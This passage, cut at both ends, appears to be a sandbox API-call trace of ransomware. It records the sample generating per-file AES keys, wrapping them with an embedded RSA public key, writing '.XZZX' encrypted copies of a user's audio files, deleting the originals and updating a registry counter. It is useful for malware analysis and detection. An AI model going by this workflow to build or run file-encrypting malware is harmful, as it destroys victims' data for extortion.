Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x439a0a8) returned 1 [0052.170] CryptGenKey (in: hProv=0x439a0a8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e288b8) returned 1 [0052.258] CryptExportKey (in: hKey=0x3e288b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0052.258] CryptExportKey (in: hKey=0x3e288b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0052.258] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0052.259] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0052.259] CryptDestroyKey (hKey=0x3e288b8) returned 1 [0052.259] CryptReleaseContext (hProv=0x439a0a8, dwFlags=0x0) returned 1 [0052.259] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\1037641408F8F044B7533AA10D10D48C.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\1037641408f8f044b7533aa10d10d48c.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0052.260] WriteFile (in: hFile=0x610, lpBuffer=0x42e9eb8*, nNumberOfBytesToWrite=0x3dc4, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42e9eb8*, lpNumberOfBytesWritten=0x417e438*=0x3dc4, lpOverlapped=0x0) returned 1 [0052.260] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc4 [0052.261] WriteFile (in: hFile=0x610, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0052.261] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc9 [0052.261] WriteFile (in: hFile=0x610, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x12, lpOverlapped=0x0) returned 1 [0052.261] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3ddb [0052.261] WriteFile (in: hFile=0x610, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0052.261] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3de0 [0052.261] SetErrorMode (uMode=0x1) returned 0x1 [0052.261] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0052.261] OutputDebugStringW (lpOutputString="end") [0052.264] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----w°I/\x04`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0052.264] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0052.264] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x439a0a8) returned 1 [0052.265] CryptImportPublicKeyInfo (in: hCryptProv=0x439a0a8, dwCertEncodingType=0x1, pInfo=0x42e1570*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x42e15a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x42e15a8*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x3e28978) returned 1 [0052.265] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0052.265] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0052.265] CryptEncrypt (in: hKey=0x3e28978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0052.265] CryptEncrypt (in: hKey=0x3e28978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x439a130*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x439a130*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0052.266] WriteFile (in: hFile=0x610, lpBuffer=0x439a130*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x439a130*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0052.266] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0052.266] WriteFile (in: hFile=0x610, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0052.266] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0052.266] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0052.266] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x624) returned 0x0 [0052.266] RegQueryValueExW (in: hKey=0x624, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x60, lpcbData=0x417dfdc*=0x4) returned 0x0 [0052.266] RegCloseKey (hKey=0x624) returned 0x0 [0052.267] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x624) returned 0x0 [0052.267] RegSetValueExW (in: hKey=0x624, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x61, cbData=0x4 | out: lpData=0x417dfec*=0x61) returned 0x0 [0052.267] RegCloseKey (hKey=0x624) returned 0x0 [0052.267] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0052.267] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0052.268] CloseHandle (hObject=0x610) returned 1 [0052.268] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0052.269] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0052.269] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\aF_IB.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\af_ib.m4a")) returned 1 [0052.270] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\aF_IB.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\af_ib.m4a")) returned 0 Thread: id = 192 os_tid = 0xb2c [0052.319] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0052.319] lstrcpyW (in: lpString1=0x417f460, lpString2="jEamZMQ.mp3" | out: lpString1="jEamZMQ.mp3") returned="jEamZMQ.mp3" [0052.319] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0052.319] SetErrorMode (uMode=0x1) returned 0x1 [0052.319] lstrcpyW (in: lpString1=0x417f860, lpString2="jEamZMQ.mp3" | out: lpString1="jEamZMQ.mp3") returned="jEamZMQ.mp3" [0052.320] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0xa6fb7702, Data2=0x626c, Data3=0x4be0, Data4=([0]=0xb1, [1]=0xa8, [2]=0x4a, [3]=0x99, [4]=0xde, [5]=0x2, [6]=0x26, [7]=0x62))) returned 0x0 [0052.320] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\jEamZMQ.mp3") returned 70 [0052.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0052.320] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\B5A4F8D81D2BC280A6FB77022143A6C8.XZZX") returned 96 [0052.320] StrStrW (lpFirst="jEamZMQ.mp3", lpSrch="XZZX") returned 0x0 [0052.320] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\jEamZMQ.mp3", dwFileAttributes=0x20) returned 1 [0052.320] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\jEamZMQ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\jeamzmq.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x620 [0052.320] ReadFile (in: hFile=0x620, lpBuffer=0x4385008, nNumberOfBytesToRead=0xcd58, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x4385008*, lpNumberOfBytesRead=0x417e418*=0xcd58, lpOverlapped=0x0) returned 1 [0052.321] CloseHandle (hObject=0x620) returned 1 [0052.321] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0052.322] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0052.322] SetErrorMode (uMode=0x1) returned 0x1 [0052.322] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0052.322] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x439a1b8) returned 1 [0052.325] CryptGenKey (in: hProv=0x439a1b8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e288b8) returned 1 [0052.468] CryptExportKey (in: hKey=0x3e288b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0052.468] CryptExportKey (in: hKey=0x3e288b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0052.468] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0052.469] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0052.469] CryptDestroyKey (hKey=0x3e288b8) returned 1 [0052.469] CryptReleaseContext (hProv=0x439a1b8, dwFlags=0x0) returned 1 [0052.469] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\B5A4F8D81D2BC280A6FB77022143A6C8.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\b5a4f8d81d2bc280a6fb77022143a6c8.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x620 [0052.470] WriteFile (in: hFile=0x620, lpBuffer=0x4385008*, nNumberOfBytesToWrite=0xcd58, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x4385008*, lpNumberOfBytesWritten=0x417e438*=0xcd58, lpOverlapped=0x0) returned 1 [0052.471] SetFilePointer (in: hFile=0x620, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xcd58 [0052.471] WriteFile (in: hFile=0x620, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0052.471] SetFilePointer (in: hFile=0x620, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xcd5d [0052.471] WriteFile (in: hFile=0x620, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x16, lpOverlapped=0x0) returned 1 [0052.471] SetFilePointer (in: hFile=0x620, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xcd73 [0052.471] WriteFile (in: hFile=0x620, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0052.471] SetFilePointer (in: hFile=0x620, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xcd78 [0052.472] SetErrorMode (uMode=0x1) returned 0x1 [0052.472] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0052.472] OutputDebugStringW (lpOutputString="end") [0052.472] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----w°I/\x04`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0052.472] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0052.472] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x439a1b8) returned 1 [0052.473] CryptImportPublicKeyInfo (in: hCryptProv=0x439a1b8, dwCertEncodingType=0x1, pInfo=0x42e1640*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x42e1670*, PublicKey.cbData=0x8c, PublicKey.pbData=0x42e1678*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x3e289b8) returned 1 [0052.473] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0052.473] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0052.473] CryptEncrypt (in: hKey=0x3e289b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0052.473] CryptEncrypt (in: hKey=0x3e289b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x439a240*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x439a240*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0052.474] WriteFile (in: hFile=0x620, lpBuffer=0x439a240*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x439a240*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0052.474] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0052.474] WriteFile (in: hFile=0x620, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0052.474] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0052.474] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0052.475] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x604) returned 0x0 [0052.475] RegQueryValueExW (in: hKey=0x604, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x61, lpcbData=0x417dfdc*=0x4) returned 0x0 [0052.475] RegCloseKey (hKey=0x604) returned 0x0 [0052.475] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x604) returned 0x0 [0052.475] RegSetValueExW (in: hKey=0x604, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x62, cbData=0x4 | out: lpData=0x417dfec*=0x62) returned 0x0 [0052.476] RegCloseKey (hKey=0x604) returned 0x0 [0052.476] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0052.476] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0052.476] CloseHandle (hObject=0x620) returned 1 [0052.478] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0052.478] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0052.479] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\jEamZMQ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\jeamzmq.mp3")) returned 1 [0052.480] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\jEamZMQ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\jeamzmq.mp3")) returned 0 Thread: id = 193 os_tid = 0xb5c [0052.480] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0052.480] lstrcpyW (in: lpString1=0x42cf460, lpString2="JO1Lf.m4a" | out: lpString1="JO1Lf.m4a") returned="JO1Lf.m4a" [0052.480] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0052.480] SetErrorMode (uMode=0x1) returned 0x1 [0052.481] lstrcpyW (in: lpString1=0x42cf860, lpString2="JO1Lf.m4a" | out: lpString1="JO1Lf.m4a") returned="JO1Lf.m4a" [0052.481] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0xb3b60ce1, Data2=0xb088, Data3=0x473f, Data4=([0]=0xb3, [1]=0x23, [2]=0x55, [3]=0x0, [4]=0xcf, [5]=0x44, [6]=0xa6, [7]=0x4e))) returned 0x0 [0052.481] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\JO1Lf.m4a") returned 68 [0052.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0052.481] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\A191878831212978B3B60CE1354E0DC0.XZZX") returned 96 [0052.481] StrStrW (lpFirst="JO1Lf.m4a", lpSrch="XZZX") returned 0x0 [0052.481] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\JO1Lf.m4a", dwFileAttributes=0x20) returned 1 [0052.481] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\JO1Lf.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\jo1lf.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0052.481] ReadFile (in: hFile=0x610, lpBuffer=0x4385008, nNumberOfBytesToRead=0x141a2, lpNumberOfBytesRead=0x42ce418, lpOverlapped=0x0 | out: lpBuffer=0x4385008*, lpNumberOfBytesRead=0x42ce418*=0x141a2, lpOverlapped=0x0) returned 1 [0052.482] CloseHandle (hObject=0x610) returned 1 [0052.482] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e50000 [0052.483] VirtualAlloc (lpAddress=0x0, 